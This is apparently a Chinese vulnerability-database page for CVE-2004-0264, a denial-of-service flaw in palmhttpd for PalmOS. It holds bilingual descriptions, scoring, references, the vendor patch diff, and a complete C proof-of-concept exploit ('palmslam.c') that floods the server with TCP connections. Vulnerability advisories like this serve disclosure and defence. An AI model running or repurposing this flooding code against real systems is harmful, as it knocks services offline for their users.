CVE-2004-0264
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:42
NMCOES    

[原文]palmhttpd for PalmOS allows remote attackers to cause a denial of service (crash) by establishing two simultaneous HTTP connections, which exceeds the PalmOS accept queue.


[CNNVD]Shaun2k2 Palmhttpd Server远程拒绝服务攻击漏洞(CNNVD-200411-148)

        
        Palmhttpd server是Jim Rees编写的简单的Palm系统的WEB服务器。
        Palmhttpd服务程序对多个连接处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        PalmOS只能接收一个客户端连接,但是'httpd'却实现了while(1)循环来进行accept()连接,因此httpd可接收多个连接,攻击者提交多个连接可导致出现"Fatal Error, NetStack1.c overflowed accept queue",造成拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:shaun2k2:palmhttpd:3.0
cpe:/a:jim_rees:jim_rees_httpd:palmos

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0264
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0264
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-148
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107634638201570&w=2
(UNKNOWN)  BUGTRAQ  20040208 PalmOS httpd accept() queue overflow DoS vulnerability.
http://www.securityfocus.com/bid/9608
(VENDOR_ADVISORY)  BID  9608
http://xforce.iss.net/xforce/xfdb/15090
(VENDOR_ADVISORY)  XF  palmhttpd-accept-bo(15090)

- 漏洞信息

Shaun2k2 Palmhttpd Server远程拒绝服务攻击漏洞
中危 缓冲区溢出
2004-11-23 00:00:00 2006-08-31 00:00:00
远程  
        
        Palmhttpd server是Jim Rees编写的简单的Palm系统的WEB服务器。
        Palmhttpd服务程序对多个连接处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        PalmOS只能接收一个客户端连接,但是'httpd'却实现了while(1)循环来进行accept()连接,因此httpd可接收多个连接,攻击者提交多个连接可导致出现"Fatal Error, NetStack1.c overflowed accept queue",造成拒绝服务。
        

- 公告与补丁

        厂商补丁:
        shaun2k2
        --------
        补丁下载:
        ---httpd.patch
        --- httpd.c 2004-01-14 17:21:41.000000000 +0000
        +++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
        @@ -391,8 +391,15 @@
        NetLibAddrINToA(AppNetRefnum,
        ifinfo.param.interfaceInfo.ipAddr, host);
        printf("Listening on \n", host);
        - while (1) {
        - if (f) {
        + /* Here is where the bug manifests: PalmOS can
        only take 1 client
        + * connection (according to even the PalmOS
        programming documentation),
        + * but this loop accept()s connections forever.
        The loop is now commented
        + * out, fixing the bug.
        + * -Shaun2k2
        + */
        +
        + /*while (1) {*/
        + if (f) {
        xclose(f);
        f = NULL;
        }
        @@ -507,7 +514,7 @@
        }
        printf("stopped\n");
        -}
        +/*}*/
        char html0[] = "HTTP/1.0 200 OK\nMIME-version:
        1.0\nContent-type: \n\n";
        ---

- 漏洞信息 (23665)

Shaun2k2 Palmhttpd Server 3.0 Remote Denial of Service Vulnerability (EDBID:23665)
windows dos
2004-02-09 Verified
0 shaun2k2
N/A [点击下载]
source: http://www.securityfocus.com/bid/9608/info

It has been reported that Palmhttpd server may be prone to remote denial of service vulnerability, when an attacker attempts to establish multiple connections with the software. This issue occurs because PalmOS can only handle one client connection.

Shaun2k2 Palmhttpd version 3.0 and prior may be prone to this issue. Since the application is an extension of 'httpd for PalmOS' server by Jim Rees, it is assumed that 'httpd for PalmOS' is vulnerable as well, however, this product has been discontinued.

---palmslam.c
/* PalmOS httpd accept queue overflow PoC exploit.
 * Compile: gcc palmslam.c -o palmslam
 *
 * -shaun2k2
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025
int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("Usage: palmslam <host>
<port>\n");
                exit(-1);
        }

        int sock[MAX_CON];
        int i;
        struct sockaddr_in dest[MAX_CON];
        struct hostent *host;
        if((host = gethostbyname(argv[1])) == -1) {
                printf("Couldn't resolve %s!\n",
argv[1]);
                exit(-1);
        }

        for(i = 0; i <= MAX_CON; i++) {
                if((sock[i] = socket(AF_INET,
SOCK_STREAM, 0)) == -1) {
                        printf("Couldn't create
socket!\n");
                        exit(-1);
                }

                dest[i].sin_family = AF_INET;
                dest[i].sin_port =
htons(atoi(argv[2]));
                dest[i].sin_addr = *((struct in_addr
*)host->h_addr);

                if(connect(sock[i], (struct sockaddr
*)&dest[i], sizeof(struct sockaddr)) == -1) {
                        printf("Couldn't connect to %s
on port %s!\n", argv[1], argv[2]);
                        exit(-1);
                }

                printf("%d : Connected!\n", i);
        }
        return(0);
}		

- 漏洞信息

3892
palmhttpd Multiple Connection DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

palmhttpd contains a flaw that may allow a remote denial of service. The issue is triggered when multiple connections are established, and will result in loss of availability for the platform.

- 时间线

2004-02-08 2004-02-08
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Shaun Colley has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Shaun2k2 Palmhttpd Server Remote Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 9608
Yes No
2004-02-09 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to the vendor shaun2k2 <shaunige@yahoo.co.uk>.

- 受影响的程序版本

shaun2k2 palmhttpd 3.0
Jim Rees httpd for PalmOS

- 漏洞讨论

It has been reported that Palmhttpd server may be prone to remote denial of service vulnerability, when an attacker attempts to establish multiple connections with the software. This issue occurs because PalmOS can only handle one client connection.

Shaun2k2 Palmhttpd version 3.0 and prior may be prone to this issue. Since the application is an extension of 'httpd for PalmOS' server by Jim Rees, it is assumed that 'httpd for PalmOS' is vulnerable as well, however, this product has been discontinued.

- 漏洞利用

The following proof of concept exploit code has been supplied:

- 解决方案

The vendor has released the following patch to address this issue:
---httpd.patch
--- httpd.c 2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
NetLibAddrINToA(AppNetRefnum,
ifinfo.param.interfaceInfo.ipAddr, host);
printf("Listening on %s\n", host);

- while (1) {
- if (f) {
+ /* Here is where the bug manifests: PalmOS can
only take 1 client
+ * connection (according to even the PalmOS
programming documentation),
+ * but this loop accept()s connections forever.
The loop is now commented
+ * out, fixing the bug.
+ * -Shaun2k2
+ */
+
+ /*while (1) {*/
+ if (f) {
xclose(f);
f = NULL;
}
@@ -507,7 +514,7 @@
}

printf("stopped\n");
-}
+/*}*/

char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";
---

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站